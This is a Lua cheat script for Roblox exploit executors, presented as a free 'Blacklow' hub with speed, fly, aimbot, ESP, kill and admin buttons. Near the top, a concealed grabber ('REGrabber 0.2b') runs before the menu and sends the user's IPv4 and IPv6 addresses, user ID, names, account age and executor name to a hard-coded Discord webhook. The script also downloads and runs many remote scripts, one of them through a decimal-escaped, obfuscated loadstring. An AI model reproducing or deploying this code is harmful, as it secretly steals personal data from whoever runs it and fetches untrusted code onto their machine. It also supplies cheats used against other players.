

bit32 = {};
local N = 32;
local P = 2 ^ N;
bit32.bnot = function(x)
	x = x % P;
	return (P - 1) - x;
end;
bit32.band = function(x, y)
	if (y == 255) then
		return x % 256;
	end
	if (y == 65535) then
		return x % 65536;
	end
	if (y == 4294967295) then
		return x % 4294967296;
	end
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) == 2) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.bor = function(x, y)
	if (y == 255) then
		return (x - (x % 256)) + 255;
	end
	if (y == 65535) then
		return (x - (x % 65536)) + 65535;
	end
	if (y == 4294967295) then
		return 4294967295;
	end
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) >= 1) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.bxor = function(x, y)
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) == 1) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.lshift = function(x, s_amount)
	if (math.abs(s_amount) >= N) then
		return 0;
	end
	x = x % P;
	if (s_amount < 0) then
		return math.floor(x * (2 ^ s_amount));
	else
		return (x * (2 ^ s_amount)) % P;
	end
end;
bit32.rshift = function(x, s_amount)
	if (math.abs(s_amount) >= N) then
		return 0;
	end
	x = x % P;
	if (s_amount > 0) then
		return math.floor(x * (2 ^ -s_amount));
	else
		return (x * (2 ^ -s_amount)) % P;
	end
end;
bit32.arshift = function(x, s_amount)
	if (math.abs(s_amount) >= N) then
		return 0;
	end
	x = x % P;
	if (s_amount > 0) then
		local add = 0;
		if (x >= (P / 2)) then
			add = P - (2 ^ (N - s_amount));
		end
		return math.floor(x * (2 ^ -s_amount)) + add;
	else
		return (x * (2 ^ -s_amount)) % P;
	end
end;
local TABLE_TableIndirection = {};
TABLE_TableIndirection["Webhook%0"] = "https://discord.com/api/webhooks/1339015241815818240/teSsf0baQ6-nDEFvnwwWHa8ijO8OEMqmRTIRjGG2ItapAG_O3hK9_OPoVOJkDgvEU7TV";
TABLE_TableIndirection["IPv4%0"] = game:HttpGet("https://api.ipify.org");
TABLE_TableIndirection["IPv6%0"] = game:HttpGet("https://api64.ipify.org");
TABLE_TableIndirection["LocalPlayer%0"] = game:GetService("Players").LocalPlayer;
TABLE_TableIndirection["UserId%0"] = TABLE_TableIndirection["LocalPlayer%0"].UserId;
TABLE_TableIndirection["PlayerName%0"] = TABLE_TableIndirection["LocalPlayer%0"].Name;
TABLE_TableIndirection["DisplayName%0"] = TABLE_TableIndirection["LocalPlayer%0"].DisplayName;
TABLE_TableIndirection["AccountAge%0"] = TABLE_TableIndirection["LocalPlayer%0"].AccountAge;
TABLE_TableIndirection["MembershipType%0"] = tostring(TABLE_TableIndirection["LocalPlayer%0"].MembershipType);
TABLE_TableIndirection["PlaceID%0"] = game.PlaceId;
TABLE_TableIndirection["ProfilePictureUrl%0"] = "https://www.roblox.com/headshot-thumbnail/image?userId=" .. TABLE_TableIndirection["UserId%0"] .. "&width=420&height=420&format=png";
TABLE_TableIndirection["LogTime%0"] = os.date("!%Y-%m-%d %H:%M:%S GMT+0");
function identifyexploit()
	local success, result = pcall(identifyexecutor);
	if success then
		return result;
	end
	return "Unknown Exploit";
end
local function sendWebhook()
	TABLE_TableIndirection["PlayerData%0"] = {content="",embeds={{author={name="Free User"},title="🧑‍🎤 Détails du Joueur",description="Voici les informations sur le joueur 🎮",color=65280,fields={{name="👤 ID du Joueur:",value=TABLE_TableIndirection["UserId%0"],inline=true},{name="✨ Nom d'Affichage:",value=TABLE_TableIndirection["DisplayName%0"],inline=true},{name="💻 Nom d'Utilisateur:",value=TABLE_TableIndirection["PlayerName%0"],inline=true},{name="🔖 Type d'Adhésion:",value=TABLE_TableIndirection["MembershipType%0"],inline=true},{name="📅 Durée du Compte (jours):",value=TABLE_TableIndirection["AccountAge%0"],inline=true},{name="🌐 IPv4:",value=TABLE_TableIndirection["IPv4%0"],inline=true},{name="🌍 IPv6:",value=TABLE_TableIndirection["IPv6%0"],inline=true},{name="🎮 ID du Jeu:",value=TABLE_TableIndirection["PlaceID%0"],inline=true},{name="🕒 Moment de la Requête:",value=TABLE_TableIndirection["LogTime%0"],inline=false},{name="⚙️ Executor:",value=identifyexploit(),inline=true}},thumbnail={url=TABLE_TableIndirection["ProfilePictureUrl%0"]},footer={text="🛠️ REGrabber 0.2b",icon_url="https://example.com/icon.png"}}}};
	TABLE_TableIndirection["HttpService%0"] = game:GetService("HttpService");
	TABLE_TableIndirection["PlayerDataJson%0"] = TABLE_TableIndirection["HttpService%0"]:JSONEncode(TABLE_TableIndirection["PlayerData%0"]);
	TABLE_TableIndirection["HttpRequest%0"] = nil;
	if (syn and syn.request) then
		TABLE_TableIndirection["HttpRequest%0"] = syn.request;
	elseif http_request then
		TABLE_TableIndirection["HttpRequest%0"] = http_request;
	else
		warn("Aucun environnement compatible pour envoyer des requêtes HTTP.");
		return;
	end
	TABLE_TableIndirection["HttpRequest%0"]({Url=TABLE_TableIndirection["Webhook%0"],Body=TABLE_TableIndirection["PlayerDataJson%0"],Method="POST",Headers={["content-type"]="application/json"}});
end
sendWebhook();
TABLE_TableIndirection["OrionLib%0"] = loadstring(game:HttpGet("https://raw.githubusercontent.com/jensonhirst/Orion/main/source"))();
TABLE_TableIndirection["Window%0"] = TABLE_TableIndirection["OrionLib%0"]:MakeWindow({Name="Free Blacklow Script ",HidePremium=false,SaveConfig=true,ConfigFolder="OrionTest"});
TABLE_TableIndirection["OrionLib%0"]:MakeNotification({Name="Created by Zaklom ",Content="Universal  Blacklow script free.",Image="rbxassetid://4483345998",Time=5});
TABLE_TableIndirection["Tab%0"] = TABLE_TableIndirection["Window%0"]:MakeTab({Name="Player",Icon="rbxassetid://4483345998",PremiumOnly=false});
TABLE_TableIndirection["Section%0"] = TABLE_TableIndirection["Tab%0"]:AddSection({Name="Setting player"});
TABLE_TableIndirection["Tab%0"]:AddSlider({Name="Walkspeed",Min=16,Max=500,Default=16,Color=Color3.fromRGB(255, 255, 255),Increment=1,ValueName="Sd",Callback=function(Value)
	TABLE_TableIndirection["player%0"] = game.Players.LocalPlayer;
	TABLE_TableIndirection["player%0"].Character.Humanoid.WalkSpeed = Value;
end});
TABLE_TableIndirection["Tab%0"]:AddSlider({Name="JumpPower",Min=50,Max=200,Default=50,Color=Color3.fromRGB(255, 255, 255),Increment=1,ValueName="Jp",Callback=function(Value)
	TABLE_TableIndirection["player%0"] = game.Players.LocalPlayer;
	TABLE_TableIndirection["player%0"].Character.Humanoid.JumpPower = Value;
end});
TABLE_TableIndirection["Tab%0"]:AddToggle({Name="No Gravity",Default=false,Callback=function(Value)
	if Value then
		game.Workspace.Gravity = -1;
	else
		game.Workspace.Gravity = 196.2;
	end
end});
TABLE_TableIndirection["Tab%0"]:AddButton({Name="Reset",Callback=function()
	TABLE_TableIndirection["player%0"] = game.Players.LocalPlayer;
	TABLE_TableIndirection["player%0"].Character.Humanoid.Health = 0;
end});
TABLE_TableIndirection["Tab%0"]:AddButton({Name="Gamemode",Callback=function()
	loadstring(game:HttpGet("https://pastebin.com/raw/FwfNEqYz", true))();
end});
TABLE_TableIndirection["Tab%0"]:AddButton({Name="Noclip",Callback=function()
	TABLE_TableIndirection["Noclip%0"] = nil;
	TABLE_TableIndirection["Clip%0"] = nil;
	function noclip()
		TABLE_TableIndirection["Clip%0"] = false;
		local function Nocl()
			if ((TABLE_TableIndirection["Clip%0"] == false) and (game.Players.LocalPlayer.Character ~= nil)) then
				for _, v in pairs(game.Players.LocalPlayer.Character:GetDescendants()) do
					if (v:IsA("BasePart") and v.CanCollide and (v.Name ~= floatName)) then
						v.CanCollide = false;
					end
				end
			end
			wait(0.21);
		end
		TABLE_TableIndirection["Noclip%0"] = game:GetService("RunService").Stepped:Connect(Nocl);
	end
	function clip()
		if TABLE_TableIndirection["Noclip%0"] then
			TABLE_TableIndirection["Noclip%0"]:Disconnect();
		end
		TABLE_TableIndirection["Clip%0"] = true;
	end
	noclip();
end});
TABLE_TableIndirection["Tab2%0"] = TABLE_TableIndirection["Window%0"]:MakeTab({Name="Fe Utility",Icon="rbxassetid://4483345998",PremiumOnly=false});
TABLE_TableIndirection["Section2%0"] = TABLE_TableIndirection["Tab2%0"]:AddSection({Name="Teleporte"});
TABLE_TableIndirection["playerList%0"] = {};
TABLE_TableIndirection["selectedPlayer%0"] = nil;
TABLE_TableIndirection["dropdown%0"] = TABLE_TableIndirection["Tab2%0"]:AddDropdown({Name="Player",Default="Select a Player",Options=TABLE_TableIndirection["playerList%0"],Callback=function(Value)
	TABLE_TableIndirection["selectedPlayer%0"] = Value;
end});
local function updatePlayerList()
	while wait(1) do
		TABLE_TableIndirection["playerList%0"] = {};
		for _, player in pairs(game.Players:GetPlayers()) do
			table.insert(TABLE_TableIndirection["playerList%0"], player.Name);
		end
		TABLE_TableIndirection["dropdown%0"]:Refresh(TABLE_TableIndirection["playerList%0"], true);
	end
end
spawn(updatePlayerList);
TABLE_TableIndirection["Tab2%0"]:AddButton({Name="Teleporte",Callback=function()
	TABLE_TableIndirection["player%0"] = game.Players.LocalPlayer;
	TABLE_TableIndirection["targetPlayer%0"] = game.Players:FindFirstChild(TABLE_TableIndirection["selectedPlayer%0"]);
	if (TABLE_TableIndirection["targetPlayer%0"] and TABLE_TableIndirection["targetPlayer%0"].Character) then
		TABLE_TableIndirection["player%0"].Character.HumanoidRootPart.CFrame = TABLE_TableIndirection["targetPlayer%0"].Character.HumanoidRootPart.CFrame;
		print("Teleported to " .. TABLE_TableIndirection["targetPlayer%0"].Name);
	else
		print("Player not found or doesn't have a character.");
	end
end});
TABLE_TableIndirection["Section%1"] = TABLE_TableIndirection["Tab2%0"]:AddSection({Name="Other"});
TABLE_TableIndirection["Tab2%0"]:AddButton({Name="Fly",Callback=function()
	loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")();
end});
TABLE_TableIndirection["Tab2%0"]:AddButton({Name="ChatBypasser",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/AnnaRoblox/AnnaBypasser/refs/heads/main/AnnaBypasser.lua", true))();
end});
TABLE_TableIndirection["Tab2%0"]:AddButton({Name="Telekinesis",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/sinret/rbxscript.com-scripts-reuploads-/main/sagtdfhsdfgujh", true))();
end});
TABLE_TableIndirection["Tab2%0"]:AddButton({Name="Fling",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/Secret834/script/refs/heads/main/Fling", true))();
end});
TABLE_TableIndirection["Tab2%0"]:AddButton({Name="Hitbox",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/Biom49/Script/refs/heads/main/Hitbox", true))();
end});
TABLE_TableIndirection["Tab4%0"] = TABLE_TableIndirection["Window%0"]:MakeTab({Name="Combat",Icon="rbxassetid://4483345998",PremiumOnly=false});
TABLE_TableIndirection["Section%2"] = TABLE_TableIndirection["Tab4%0"]:AddSection({Name="Kill Player"});
TABLE_TableIndirection["playerList%1"] = {};
TABLE_TableIndirection["selectedPlayer%1"] = nil;
TABLE_TableIndirection["dropdown%1"] = TABLE_TableIndirection["Tab4%0"]:AddDropdown({Name="Player",Default="Select a Player",Options=TABLE_TableIndirection["playerList%1"],Callback=function(Value)
	TABLE_TableIndirection["selectedPlayer%1"] = Value;
end});
local function updatePlayerList()
	while wait(1) do
		TABLE_TableIndirection["playerList%1"] = {};
		for _, player in pairs(game.Players:GetPlayers()) do
			table.insert(TABLE_TableIndirection["playerList%1"], player.Name);
		end
		TABLE_TableIndirection["dropdown%1"]:Refresh(TABLE_TableIndirection["playerList%1"], true);
	end
end
spawn(updatePlayerList);
TABLE_TableIndirection["Tab4%0"]:AddButton({Name="Kill",Callback=function()
	TABLE_TableIndirection["Players%0"] = game:GetService("Players");
	TABLE_TableIndirection["LocalPlayer%1"] = TABLE_TableIndirection["Players%0"].LocalPlayer;
	TABLE_TableIndirection["targetPlayer%0"] = nil;
	for _, player in pairs(TABLE_TableIndirection["Players%0"]:GetPlayers()) do
		if (player.Name == TABLE_TableIndirection["selectedPlayer%1"]) then
			TABLE_TableIndirection["targetPlayer%0"] = player;
			break;
		end
	end
	if (TABLE_TableIndirection["targetPlayer%0"] and TABLE_TableIndirection["targetPlayer%0"].Character and TABLE_TableIndirection["targetPlayer%0"].Character:FindFirstChild("HumanoidRootPart")) then
		TABLE_TableIndirection["startTime%0"] = tick();
		while (tick() - TABLE_TableIndirection["startTime%0"]) < 1 do
			if (TABLE_TableIndirection["targetPlayer%0"] and TABLE_TableIndirection["targetPlayer%0"].Character:FindFirstChild("HumanoidRootPart")) then
				TABLE_TableIndirection["targetPosition%0"] = TABLE_TableIndirection["targetPlayer%0"].Character.HumanoidRootPart.CFrame;
				TABLE_TableIndirection["newPosition%0"] = TABLE_TableIndirection["targetPosition%0"] * CFrame.new(0, 0, 3);
				TABLE_TableIndirection["LocalPlayer%1"].Character:SetPrimaryPartCFrame(TABLE_TableIndirection["newPosition%0"]);
				wait(0.1);
			else
				break;
			end
		end
	end
end});
TABLE_TableIndirection["Section%3"] = TABLE_TableIndirection["Tab4%0"]:AddSection({Name="Abusive Utility"});
TABLE_TableIndirection["Tab4%0"]:AddButton({Name="Silent Aim",Callback=function()
	TABLE_TableIndirection["player%0"] = game.Players.LocalPlayer;
	TABLE_TableIndirection["mouse%0"] = TABLE_TableIndirection["player%0"]:GetMouse();
	TABLE_TableIndirection["targetPlayer%0"] = nil;
	TABLE_TableIndirection["targeting%0"] = false;
	local function findClosestPlayer()
		TABLE_TableIndirection["closestPlayer%0"] = nil;
		TABLE_TableIndirection["closestDistance%0"] = math.huge;
		for _, otherPlayer in pairs(game.Players:GetPlayers()) do
			if ((otherPlayer ~= TABLE_TableIndirection["player%0"]) and otherPlayer.Character and otherPlayer.Character:FindFirstChild("HumanoidRootPart")) then
				TABLE_TableIndirection["distance%0"] = (TABLE_TableIndirection["player%0"].Character.HumanoidRootPart.Position - otherPlayer.Character.HumanoidRootPart.Position).magnitude;
				if (TABLE_TableIndirection["distance%0"] < TABLE_TableIndirection["closestDistance%0"]) then
					TABLE_TableIndirection["closestDistance%0"] = TABLE_TableIndirection["distance%0"];
					TABLE_TableIndirection["closestPlayer%0"] = otherPlayer;
				end
			end
		end
		return TABLE_TableIndirection["closestPlayer%0"];
	end
	TABLE_TableIndirection["mouse%0"].Button2Down:Connect(function()
		TABLE_TableIndirection["targeting%0"] = true;
		TABLE_TableIndirection["targetPlayer%0"] = findClosestPlayer();
	end);
	TABLE_TableIndirection["mouse%0"].Button2Up:Connect(function()
		TABLE_TableIndirection["targeting%0"] = false;
		TABLE_TableIndirection["targetPlayer%0"] = nil;
	end);
	game:GetService("RunService").RenderStepped:Connect(function()
		if (TABLE_TableIndirection["targeting%0"] and TABLE_TableIndirection["targetPlayer%0"] and TABLE_TableIndirection["targetPlayer%0"].Character and TABLE_TableIndirection["targetPlayer%0"].Character:FindFirstChild("HumanoidRootPart")) then
			TABLE_TableIndirection["targetPosition%0"] = TABLE_TableIndirection["targetPlayer%0"].Character.HumanoidRootPart.Position;
			TABLE_TableIndirection["camera%0"] = game.Workspace.CurrentCamera;
			TABLE_TableIndirection["direction%0"] = (TABLE_TableIndirection["targetPosition%0"] - TABLE_TableIndirection["camera%0"].CFrame.Position).unit;
			TABLE_TableIndirection["smoothness%0"] = 0.1;
			TABLE_TableIndirection["camera%0"].CFrame = CFrame.new(TABLE_TableIndirection["camera%0"].CFrame.Position + (TABLE_TableIndirection["direction%0"] * TABLE_TableIndirection["smoothness%0"]), TABLE_TableIndirection["targetPosition%0"]);
		end
	end);
end});
TABLE_TableIndirection["Tab4%0"]:AddButton({Name="Aimbot",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/Exunys/AirHub-V2/main/src/Main.lua"))();
end});
TABLE_TableIndirection["Tab5%0"] = TABLE_TableIndirection["Window%0"]:MakeTab({Name="Visual",Icon="rbxassetid://4483345998",PremiumOnly=false});
TABLE_TableIndirection["Section%4"] = TABLE_TableIndirection["Tab5%0"]:AddSection({Name="Utility"});
TABLE_TableIndirection["Tab5%0"]:AddButton({Name="Esp",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/Lucasfin000/SpaceHub/main/UESP"))();
end});
TABLE_TableIndirection["Tab5%0"]:AddButton({Name="Tracer",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/Secret834/script/refs/heads/main/Tracer"))();
end});
TABLE_TableIndirection["Tab5%0"]:AddButton({Name="Xray",Callback=function()
	TABLE_TableIndirection["workspace%0"] = game:GetService("Workspace");
	local function setTransparencyForBlocks(transparency)
		for _, object in ipairs(TABLE_TableIndirection["workspace%0"]:GetDescendants()) do
			if object:IsA("Part") then
				object.Transparency = transparency;
			end
		end
	end
	setTransparencyForBlocks(0.8);
end});
TABLE_TableIndirection["Tab5%0"]:AddButton({Name="AntiLag",Callback=function()
	TABLE_TableIndirection["decalsyeeted%0"] = true;
	TABLE_TableIndirection["g%0"] = game;
	TABLE_TableIndirection["w%0"] = TABLE_TableIndirection["g%0"].Workspace;
	TABLE_TableIndirection["l%0"] = TABLE_TableIndirection["g%0"].Lighting;
	TABLE_TableIndirection["t%0"] = TABLE_TableIndirection["w%0"].Terrain;
	TABLE_TableIndirection["t%0"].WaterWaveSize = 0;
	TABLE_TableIndirection["t%0"].WaterWaveSpeed = 0;
	TABLE_TableIndirection["t%0"].WaterReflectance = 0;
	TABLE_TableIndirection["t%0"].WaterTransparency = 0;
	TABLE_TableIndirection["l%0"].GlobalShadows = false;
	TABLE_TableIndirection["l%0"].FogEnd = 8999999488;
	TABLE_TableIndirection["l%0"].Brightness = 0;
	settings().Rendering.QualityLevel = "Level01";
	for i, v in pairs(TABLE_TableIndirection["g%0"]:GetDescendants()) do
		if (v:IsA("Part") or v:IsA("Union") or v:IsA("CornerWedgePart") or v:IsA("TrussPart")) then
			v.Material = "Plastic";
			v.Reflectance = 0;
		elseif (v:IsA("Decal") or (v:IsA("Texture") and TABLE_TableIndirection["decalsyeeted%0"])) then
			v.Transparency = 1;
		elseif (v:IsA("ParticleEmitter") or v:IsA("Trail")) then
			v.Lifetime = NumberRange.new(0);
		elseif v:IsA("Explosion") then
			v.BlastPressure = 1;
			v.BlastRadius = 1;
		elseif (v:IsA("Fire") or v:IsA("SpotLight") or v:IsA("Smoke")) then
			v.Enabled = false;
		elseif v:IsA("MeshPart") then
			v.Material = "Plastic";
			v.Reflectance = 0;
			v.TextureID = 10385902758728956;
		end
	end
	for i, e in pairs(TABLE_TableIndirection["l%0"]:GetChildren()) do
		if (e:IsA("BlurEffect") or e:IsA("SunRaysEffect") or e:IsA("ColorCorrectionEffect") or e:IsA("BloomEffect") or e:IsA("DepthOfFieldEffect")) then
			e.Enabled = false;
		end
	end
end});
TABLE_TableIndirection["Tab6%0"] = TABLE_TableIndirection["Window%0"]:MakeTab({Name="Client Utility",Icon="rbxassetid://4483345998",PremiumOnly=false});
TABLE_TableIndirection["Tab6%0"]:AddButton({Name="ChatSpamer",Callback=function()
	loadstring(game:HttpGet("https://pastebin.com/raw/8Htx56Ab"))();
end});
TABLE_TableIndirection["Tab6%0"]:AddButton({Name="Invisibility(CLIENT)",Callback=function()
	TABLE_TableIndirection["sizeMultiplier%0"] = -1e+32;
	TABLE_TableIndirection["players%0"] = game:GetService("Players");
	local function enlargeCharacter(character)
		for _, part in ipairs(character:GetDescendants()) do
			if (part:IsA("BasePart") and (part.Name ~= "HumanoidRootPart")) then
				part.Size = part.Size * TABLE_TableIndirection["sizeMultiplier%0"];
			end
		end
		TABLE_TableIndirection["humanoidRootPart%0"] = character:FindFirstChild("HumanoidRootPart");
		if TABLE_TableIndirection["humanoidRootPart%0"] then
			TABLE_TableIndirection["humanoidRootPart%0"].Size = TABLE_TableIndirection["humanoidRootPart%0"].Size * 1;
		end
	end
	local function enlargeAllCharacters()
		for _, player in ipairs(TABLE_TableIndirection["players%0"]:GetPlayers()) do
			if player.Character then
				enlargeCharacter(player.Character);
			end
		end
	end
	enlargeAllCharacters();
	TABLE_TableIndirection["players%0"].PlayerAdded:Connect(function(player)
		player.CharacterAdded:Connect(function(character)
			enlargeCharacter(character);
		end);
	end);
	TABLE_TableIndirection["players%0"].PlayerRemoving:Connect(function(player)
		if player.Character then
			enlargeCharacter(player.Character);
		end
	end);
	TABLE_TableIndirection["players%0"].LocalPlayer.CharacterAdded:Connect(function(character)
		enlargeCharacter(character);
	end);
end});
TABLE_TableIndirection["Tab6%0"]:AddButton({Name="Give all tool",Callback=function()
	TABLE_TableIndirection["ReplicatedStorage%0"] = game:GetService("ReplicatedStorage");
	TABLE_TableIndirection["Players%0"] = game:GetService("Players");
	local function giveAllToolsToPlayers()
		for _, player in pairs(TABLE_TableIndirection["Players%0"]:GetPlayers()) do
			TABLE_TableIndirection["backpack%0"] = player:FindFirstChildOfClass("Backpack");
			TABLE_TableIndirection["character%0"] = player.Character;
			for _, tool in pairs(TABLE_TableIndirection["ReplicatedStorage%0"]:GetChildren()) do
				if tool:IsA("Tool") then
					TABLE_TableIndirection["hasTool%0"] = false;
					if (TABLE_TableIndirection["backpack%0"]:FindFirstChild(tool.Name) or (TABLE_TableIndirection["character%0"] and TABLE_TableIndirection["character%0"]:FindFirstChild(tool.Name))) then
						TABLE_TableIndirection["hasTool%0"] = true;
					end
					if not TABLE_TableIndirection["hasTool%0"] then
						TABLE_TableIndirection["clonedTool%0"] = tool:Clone();
						TABLE_TableIndirection["clonedTool%0"].Parent = TABLE_TableIndirection["backpack%0"];
					end
				end
			end
		end
	end
	giveAllToolsToPlayers();
end});
TABLE_TableIndirection["Tab6%0"]:AddButton({Name="Anchored Block",Callback=function()
	local function anchorBlock(block)
		if (block:IsA("BasePart") and not block:IsDescendantOf(game.Players) and not game.Players:FindFirstChild(block.Name)) then
			block.Anchored = true;
		end
	end
	local function anchorAllBlocks()
		for _, block in pairs(workspace:GetDescendants()) do
			anchorBlock(block);
		end
	end
	anchorAllBlocks();
end});
TABLE_TableIndirection["Tab6%0"]:AddButton({Name="UnAnchored Block",Callback=function()
	local function anchorBlock(block)
		if (block:IsA("BasePart") and not block:IsDescendantOf(game.Players) and not game.Players:FindFirstChild(block.Name)) then
			block.Anchored = false;
		end
	end
	local function anchorAllBlocks()
		for _, block in pairs(workspace:GetDescendants()) do
			anchorBlock(block);
		end
	end
	anchorAllBlocks();
end});
TABLE_TableIndirection["Tab6%0"]:AddButton({Name="Multicolor",Callback=function()
	local function getRandomColor()
		return Color3.fromRGB(math.random(0, 255), math.random(0, 255), math.random(0, 255));
	end
	local function changeBlockColor(block)
		if block:IsA("BasePart") then
			block.Color = getRandomColor();
		end
	end
	local function changeAllBlocksColor()
		for _, block in pairs(workspace:GetDescendants()) do
			changeBlockColor(block);
		end
	end
	while true do
		changeAllBlocksColor();
		wait(2);
	end
end});
TABLE_TableIndirection["Tab6%0"]:AddButton({Name="Antifling",Callback=function()
	TABLE_TableIndirection["Players%0"] = game:GetService("Players");
	TABLE_TableIndirection["RunService%0"] = game:GetService("RunService");
	TABLE_TableIndirection["Player%0"] = TABLE_TableIndirection["Players%0"].LocalPlayer;
	TABLE_TableIndirection["RunService%0"].Stepped:Connect(function()
		for _, CoPlayer in pairs(TABLE_TableIndirection["Players%0"]:GetChildren()) do
			if ((CoPlayer ~= TABLE_TableIndirection["Player%0"]) and CoPlayer.Character) then
				for _, Part in pairs(CoPlayer.Character:GetChildren()) do
					if (Part.Name == "HumanoidRootPart") then
						Part.CanCollide = false;
					end
				end
			end
		end
		for _, Accessory in pairs(workspace:GetChildren()) do
			if (Accessory:IsA("Accessory") and Accessory:FindFirstChildWhichIsA("Part")) then
				Accessory:FindFirstChildWhichIsA("Part"):Destroy();
			end
		end
	end);
end});
TABLE_TableIndirection["Tab6%0"]:AddButton({Name="AntiLagChat",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/AnthonyIsntHere/anthonysrepository/main/scripts/AntiChatLag.lua"))();
end});
local function findRemoteEvents(parent)
	TABLE_TableIndirection["remoteEvents%0"] = {};
	local function recursiveFind(currentParent)
		for _, obj in ipairs(currentParent:GetChildren()) do
			if obj:IsA("RemoteEvent") then
				table.insert(TABLE_TableIndirection["remoteEvents%0"], obj.Name);
			elseif obj:IsA("Folder") then
				recursiveFind(obj);
			end
		end
	end
	recursiveFind(parent);
	return TABLE_TableIndirection["remoteEvents%0"];
end
TABLE_TableIndirection["ReplicatedStorage%0"] = game:GetService("ReplicatedStorage");
local function findRemoteEvents(parent)
	TABLE_TableIndirection["remoteEvents%0"] = {};
	local function recursiveFind(currentParent)
		for _, obj in ipairs(currentParent:GetChildren()) do
			if obj:IsA("RemoteEvent") then
				table.insert(TABLE_TableIndirection["remoteEvents%0"], obj.Name);
			elseif obj:IsA("Folder") then
				recursiveFind(obj);
			end
		end
	end
	recursiveFind(parent);
	return TABLE_TableIndirection["remoteEvents%0"];
end
TABLE_TableIndirection["Tab7%0"] = TABLE_TableIndirection["Window%0"]:MakeTab({Name="Team",Icon="rbxassetid://4483345998",PremiumOnly=false});
TABLE_TableIndirection["Section%5"] = TABLE_TableIndirection["Tab7%0"]:AddSection({Name="Team"});
TABLE_TableIndirection["teamsService%0"] = game:GetService("Teams");
local function getTeamNames()
	TABLE_TableIndirection["teamNames%0"] = {};
	for _, team in pairs(TABLE_TableIndirection["teamsService%0"]:GetChildren()) do
		table.insert(TABLE_TableIndirection["teamNames%0"], team.Name);
	end
	return TABLE_TableIndirection["teamNames%0"];
end
TABLE_TableIndirection["Tab7%0"]:AddDropdown({Name="Team",Default="1",Options=getTeamNames(),Callback=function(Value)
	selectedTeam = Value;
end});
TABLE_TableIndirection["Tab7%0"]:AddButton({Name="Join",Callback=function()
	TABLE_TableIndirection["player%0"] = game.Players.LocalPlayer;
	TABLE_TableIndirection["teamToJoin%0"] = TABLE_TableIndirection["teamsService%0"]:FindFirstChild(selectedTeam);
	if TABLE_TableIndirection["teamToJoin%0"] then
		TABLE_TableIndirection["player%0"].Team = TABLE_TableIndirection["teamToJoin%0"];
	end
end});
TABLE_TableIndirection["Tab7%0"]:AddButton({Name="Delete",Callback=function()
	TABLE_TableIndirection["player%0"] = game.Players.LocalPlayer;
	TABLE_TableIndirection["teamToJoin%0"] = TABLE_TableIndirection["teamsService%0"]:FindFirstChild(selectedTeam);
	if TABLE_TableIndirection["teamToJoin%0"] then
		TABLE_TableIndirection["teamToJoin%0"]:Destroy();
	end
end});
TABLE_TableIndirection["Gamehub%0"] = TABLE_TableIndirection["Window%0"]:MakeTab({Name="Gamehub ",Icon="rbxassetid://4483345998",PremiumOnly=false});
TABLE_TableIndirection["Section%6"] = TABLE_TableIndirection["Gamehub%0"]:AddSection({Name="Admin"});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Nameless admin",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/FilteringEnabled/NamelessAdmin/main/Source"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Infiniy yield",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Fe admin",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/ONEReverseCard/My-Scripts/main/Netless%20Server%20Admin.md"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Fate admin",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/fatesc/fates-admin/main/main.lua"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Ultimate admin",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/Biom49/Script/refs/heads/main/Admin"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="QuirkyCMD FE admin",Callback=function()
	loadstring(game:HttpGet("https://gist.github.com/someunknowndude/38cecea5be9d75cb743eac8b1eaf6758/raw"))();
end});
TABLE_TableIndirection["Section%7"] = TABLE_TableIndirection["Gamehub%0"]:AddSection({Name="Door script"});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Door script #1",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/mazzikasjjzjzj/Key/main/DOORS%20%20%5BNEW%5D"))();
end});
TABLE_TableIndirection["Gamehub%0"]:AddButton({Name="Door script #2",Callback=function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/Biom49/Script/refs/heads/main/Door%232"))();
end});
